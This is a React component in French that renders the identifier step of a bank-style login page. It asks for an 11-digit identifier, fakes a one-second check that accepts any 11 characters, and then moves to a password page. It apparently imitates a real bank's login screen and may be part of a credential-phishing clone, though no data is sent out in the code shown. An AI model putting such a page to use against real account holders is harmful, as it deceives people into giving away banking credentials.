import { useContext } from "react";
import {
  CurrentPage,
  UserValues,
  UserErrors,
  UserButtons,
} from "../../Context/Context";
import styles from "./LogPage.module.css";

function LogPage() {

  const [currentPageState, setCurrentPageState] = useContext(CurrentPage);
  const [userValuesState, setuserValuesState] = useContext(UserValues);
  const [userErrorsState, setuserErrorsState] = useContext(UserErrors);
  const [userButtonsState, setuserButtonsState] = useContext(UserButtons);

  const changeHandlerLog = (e) => {
    setuserValuesState({ ...userValuesState, log: e.target.value });
  };

  const onclickLogPage = () => {
    // disable valider button
    setuserButtonsState({
      ...userButtonsState,
      LogPageButtonDisabled: true,
    });

    // wait 1 sec
    setTimeout(() => {
      if(userValuesState.log.length === 11 ){
        //change page
        setCurrentPageState("PassPage");
      } else {
        // enable button valider
        setuserButtonsState({
          ...userButtonsState,
          LogPageButtonDisabled: false,
        });

        // show error
        setuserErrorsState({ ...userErrorsState, logPageError: true });
      }
    }, 1000);
  };

  return (
    <div className={styles.container}>
      <div className={styles.lineOne}>
        <img alt="" src="./images/acceder.png" />
      </div>

      <div className={styles.lineTwo}>
        <div className={styles.partOne}>
          <div className={styles.identifiant}>IDENTIFIANT</div>
          <div className={styles.saissisiez}>
            Saisissez votre identifiant à 11 chiffres
          </div>
          <div
            className={styles.error}
            style={
              userErrorsState.logPageError
                ? { display: "block" }
                : { display: "none" }
            }
          >
            Veuillez ressaisir votre identifiant et votre code personnel.
          </div>
          <div className={styles.input}>
            <input
              type="text"
              placeholder="Ex: 98652706859"
              maxLength="11"
              value={userValuesState.log}
              onChange={changeHandlerLog}
            />
          </div>

          <button
            className={styles.button + " noselect"}
            style={
              userButtonsState.LogPageButtonDisabled
                ? { backgroundColor: "#98cbd3" }
                : { backgroundColor: "#007d8f" }
            }
            disabled={userButtonsState.LogPageButtonDisabled}
            onClick={onclickLogPage}
          >
            ENTER MON CODE PERSONNEL
          </button>
        </div>

        <div className={styles.partTwo}>
          <img alt="" src="./images/info.png" />
        </div>
      </div>

      <div className={styles.lineTree}>
        <div className={styles.devenirImg}>
          <img alt="" src="./images/devenir.png" />
        </div>
        <div className={styles.devenir + " noselect"}>Devenir</div>
      </div>
    </div>
  );
}

export default LogPage;
